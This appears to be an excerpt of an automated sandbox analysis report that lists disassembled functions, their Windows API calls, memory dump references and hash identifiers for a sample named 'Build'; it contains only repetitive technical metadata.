                                                                                          • Opcode Fuzzy Hash: fb27f125c29c4fe9a22f010cd40e5ed80921ab9ffbe020ffd4b739d9a99fc426
                                                                                          • Instruction Fuzzy Hash: CAA0118A2A8203BC328F32A0AC02C3F020CC0C0B2033288AAF00AC8080B8802C8C0230
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003808A7
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: f350084b74fc684de683e22f76fc40c6e82aaa84a17bdc940665a645b00e4c4c
                                                                                          • Instruction ID: 703c167344b9d4de95248fd6d6b7d5a6df78575b86dc685e8d1eef284997287b
                                                                                          • Opcode Fuzzy Hash: f350084b74fc684de683e22f76fc40c6e82aaa84a17bdc940665a645b00e4c4c
                                                                                          • Instruction Fuzzy Hash: BDA001962A9212BC369F72A5AD06C7A221CD4C4B6633189AEF44AC8482A884288D5671
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003808A7
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 9f9a369e39bce8a68fb3680b7e7481b3f10aa099e3a8b39f893dc69e5a49b670
                                                                                          • Instruction ID: 703c167344b9d4de95248fd6d6b7d5a6df78575b86dc685e8d1eef284997287b
                                                                                          • Opcode Fuzzy Hash: 9f9a369e39bce8a68fb3680b7e7481b3f10aa099e3a8b39f893dc69e5a49b670
                                                                                          • Instruction Fuzzy Hash: BDA001962A9212BC369F72A5AD06C7A221CD4C4B6633189AEF44AC8482A884288D5671
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003808A7
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 0fde2984c6b64477dace924b8c639ee0dc71c9df2d617b829b2b4632dc874b97
                                                                                          • Instruction ID: bed3fb95f80094cd69d91697bfd4e073cfadcca57eb3a6f8c2415090eafaabef
                                                                                          • Opcode Fuzzy Hash: 0fde2984c6b64477dace924b8c639ee0dc71c9df2d617b829b2b4632dc874b97
                                                                                          • Instruction Fuzzy Hash: ACA001962A9312BC369F72A5AD06C7A221CD4C0B2633189AEF449D8486A884288D5671
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003808A7
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 8f75d99f472a1fdd0a8b8bb17c97e5d490323afb96c0192da4b8fb214e777103
                                                                                          • Instruction ID: 703c167344b9d4de95248fd6d6b7d5a6df78575b86dc685e8d1eef284997287b
                                                                                          • Opcode Fuzzy Hash: 8f75d99f472a1fdd0a8b8bb17c97e5d490323afb96c0192da4b8fb214e777103
                                                                                          • Instruction Fuzzy Hash: BDA001962A9212BC369F72A5AD06C7A221CD4C4B6633189AEF44AC8482A884288D5671
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003808A7
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 6a2c49e3b21cc91dcb8bdb7958e8993258235a4491f3536c64a61a0eaf9b0620
                                                                                          • Instruction ID: 703c167344b9d4de95248fd6d6b7d5a6df78575b86dc685e8d1eef284997287b
                                                                                          • Opcode Fuzzy Hash: 6a2c49e3b21cc91dcb8bdb7958e8993258235a4491f3536c64a61a0eaf9b0620
                                                                                          • Instruction Fuzzy Hash: BDA001962A9212BC369F72A5AD06C7A221CD4C4B6633189AEF44AC8482A884288D5671
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003808A7
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 312842b507b8da512dbdcfcf4400699162b98891474765fb91c87c28dd40d365
                                                                                          • Instruction ID: 703c167344b9d4de95248fd6d6b7d5a6df78575b86dc685e8d1eef284997287b
                                                                                          • Opcode Fuzzy Hash: 312842b507b8da512dbdcfcf4400699162b98891474765fb91c87c28dd40d365
                                                                                          • Instruction Fuzzy Hash: BDA001962A9212BC369F72A5AD06C7A221CD4C4B6633189AEF44AC8482A884288D5671
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003809FC
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 1f200803c1c24f67bb267da7e330572ce05342ddb0146729fba99701c2c34c9f
                                                                                          • Instruction ID: ca8c0aa579004e9ccae0f698e00eef64c4adc0beb3d2241f1f6bd2a3ba7c5d80
                                                                                          • Opcode Fuzzy Hash: 1f200803c1c24f67bb267da7e330572ce05342ddb0146729fba99701c2c34c9f
                                                                                          • Instruction Fuzzy Hash: 04A001D63A9202BD3A8F76A5ED56CBB021CD4C4B653318AAAF406D8492A991284D5231
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003809FC
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 7dd4d7a802ca7945adf0376985bcdce6fcb4618a55bd9f65f0a4035c3b7d1137
                                                                                          • Instruction ID: ca8c0aa579004e9ccae0f698e00eef64c4adc0beb3d2241f1f6bd2a3ba7c5d80
                                                                                          • Opcode Fuzzy Hash: 7dd4d7a802ca7945adf0376985bcdce6fcb4618a55bd9f65f0a4035c3b7d1137
                                                                                          • Instruction Fuzzy Hash: 04A001D63A9202BD3A8F76A5ED56CBB021CD4C4B653318AAAF406D8492A991284D5231
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003809FC
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: d120104393efb7874b818d5d9b42f7a481bb5365fd7819fecdb77632a4b0a3b0
                                                                                          • Instruction ID: ca8c0aa579004e9ccae0f698e00eef64c4adc0beb3d2241f1f6bd2a3ba7c5d80
                                                                                          • Opcode Fuzzy Hash: d120104393efb7874b818d5d9b42f7a481bb5365fd7819fecdb77632a4b0a3b0
                                                                                          • Instruction Fuzzy Hash: 04A001D63A9202BD3A8F76A5ED56CBB021CD4C4B653318AAAF406D8492A991284D5231
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003809FC
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: f48989a9a2e75713d2afbee2e63adcb622794301d18bb0a413667b7fd89635a2
                                                                                          • Instruction ID: ca8c0aa579004e9ccae0f698e00eef64c4adc0beb3d2241f1f6bd2a3ba7c5d80
                                                                                          • Opcode Fuzzy Hash: f48989a9a2e75713d2afbee2e63adcb622794301d18bb0a413667b7fd89635a2
                                                                                          • Instruction Fuzzy Hash: 04A001D63A9202BD3A8F76A5ED56CBB021CD4C4B653318AAAF406D8492A991284D5231
                                                                                          APIs
                                                                                          • SetEndOfFile.KERNELBASE(?,0036A712,?,?,?,?,?,?,?), ref: 0036B94C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: File
                                                                                          • String ID:
                                                                                          • API String ID: 749574446-0
                                                                                          • Opcode ID: ec8b0ce66f7e5ab1317421dee4177769e27566d50a7400c638a3605fe6b2ddd7
                                                                                          • Instruction ID: 3c81d1c1ac57621602fbddf3e69b483e1cc8aa37cddabfc7fe6fc0e9d950c418
                                                                                          • Opcode Fuzzy Hash: ec8b0ce66f7e5ab1317421dee4177769e27566d50a7400c638a3605fe6b2ddd7
                                                                                          • Instruction Fuzzy Hash: 05A0243004400D47CD011731CD1500C3710F7117C070001D45007CF071C7134417C700
                                                                                          APIs
                                                                                          • SetCurrentDirectoryW.KERNELBASE(?), ref: 0037CBBA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory
                                                                                          • String ID:
                                                                                          • API String ID: 1611563598-0
                                                                                          • Opcode ID: 30e9a61bf1df1778690c13682657808e8de85862204d98301f23b8d6c14a8b03
                                                                                          • Instruction ID: e359598d827233d845272e023bec5dbd1e4dc6d5eb82b1f736403cc753e56c76
                                                                                          • Opcode Fuzzy Hash: 30e9a61bf1df1778690c13682657808e8de85862204d98301f23b8d6c14a8b03
                                                                                          • Instruction Fuzzy Hash: 81A001712062019B96025B329F4AA4EBAAAAFA2B51F05C42AA54684171DB368860AA15
                                                                                          APIs
                                                                                            • Part of subcall function 00361366: GetDlgItem.USER32(00000000,00003021), ref: 003613AA
                                                                                            • Part of subcall function 00361366: SetWindowTextW.USER32(00000000,003965F4), ref: 003613C0
                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0037E602
                                                                                          • EndDialog.USER32(?,00000006), ref: 0037E615
                                                                                          • GetDlgItem.USER32(?,0000006C), ref: 0037E631
                                                                                          • SetFocus.USER32(00000000), ref: 0037E638
                                                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 0037E66C
                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0037E69F
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0037E6B5
                                                                                            • Part of subcall function 0037CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 0037CBEE
                                                                                            • Part of subcall function 0037CBC8: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0037CC05
                                                                                            • Part of subcall function 0037CBC8: SystemTimeToFileTime.KERNEL32(?,?), ref: 0037CC19
                                                                                            • Part of subcall function 0037CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 0037CC2A
                                                                                            • Part of subcall function 0037CBC8: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0037CC42
                                                                                            • Part of subcall function 0037CBC8: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 0037CC66
                                                                                            • Part of subcall function 0037CBC8: _swprintf.LIBCMT ref: 0037CC85
                                                                                          • _swprintf.LIBCMT ref: 0037E704
                                                                                            • Part of subcall function 00364C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00364C13
                                                                                          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0037E717
                                                                                          • FindClose.KERNEL32(00000000), ref: 0037E71E
                                                                                          • _swprintf.LIBCMT ref: 0037E773
                                                                                          • SetDlgItemTextW.USER32(?,00000068,?), ref: 0037E786
                                                                                          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0037E7A0
                                                                                          • _swprintf.LIBCMT ref: 0037E7D9
                                                                                          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0037E7EC
                                                                                          • _swprintf.LIBCMT ref: 0037E83C
                                                                                          • SetDlgItemTextW.USER32(?,00000069,?), ref: 0037E84F
                                                                                            • Part of subcall function 0037D0AB: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0037D0E1
                                                                                            • Part of subcall function 0037D0AB: GetNumberFormatW.KERNEL32(00000400,00000000,?,003A272C,?,?), ref: 0037D12A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
                                                                                          • String ID: %s %s$-8$REPLACEFILEDLG
                                                                                          • API String ID: 3464475507-1750762989
                                                                                          • Opcode ID: a9e6fac3a799cf9ca245ed4795969d0a8d08b718146351d62d7c81797851d099
                                                                                          • Instruction ID: 32de9a536e8b094f96efff347b50c3b9da90e06895ef588435b861f377aa09eb
                                                                                          • Opcode Fuzzy Hash: a9e6fac3a799cf9ca245ed4795969d0a8d08b718146351d62d7c81797851d099
                                                                                          • Instruction Fuzzy Hash: C171D7B2548344BBE333AB64DC49FFF779CEB8A710F054819F64DD6180DA79A9048B62
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0036807F
                                                                                          • _wcslen.LIBCMT ref: 00368112
                                                                                            • Part of subcall function 00368C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00368CB2
                                                                                            • Part of subcall function 00368C95: GetLastError.KERNEL32 ref: 00368CF6
                                                                                            • Part of subcall function 00368C95: CloseHandle.KERNEL32(?), ref: 00368D05
